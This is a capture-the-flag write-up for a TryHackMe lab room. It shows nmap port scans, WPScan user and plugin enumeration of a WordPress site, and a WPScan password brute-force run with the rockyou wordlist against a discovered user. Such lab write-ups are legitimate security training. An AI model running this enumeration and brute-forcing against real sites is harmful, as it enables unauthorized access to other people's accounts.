This is a write-up for the TryHackMe room named “For Business Reasons”. This room is rated Hard.
This room can be found here: https://tryhackme.com/room/forbusinessreasons
Description:
In your network scan, you found an unknown VM…
You find a Host run by MilkCo*, run by a competent but not perfect team of sysadmins… But teams make mistakes.
Immature teams often do things like have all the elements of security like strict firewalls but then throw it all away by not understanding a technology or using shared passwords.
This is a hyper-realistic room. This room also features a difficult pivot.
Enumeration:
# Identify the list of services running on the target machine
sudo nmap -sS -Pn -T4 -p- 10.10.53.149
# Perform further information gathering on the open ports identified above — 80 in our case
sudo nmap -O -A -Pn -T4 -p80 10.10.53.149
Our Nmap scan reveals a WordPress site on port 80. Now let's run WPScan to check whether we can find any vulnerability.
WPScan
This will enumerate all plugins and users
wpscan --url 10.10.53.149 --enumerate u,ap
If WPScan shows XML-RPC enabled on the website, the site is exposed to password brute-force attacks, because the xmlrpc.php endpoint accepts login attempts. Here we have XML-RPC enabled and we got a user named “sysadmin”. Let's try to brute force this user's password using WPScan only.
wpscan --url http://10.10.53.149 -U sysadmin -P /usr/share/wordlists/rockyou.txt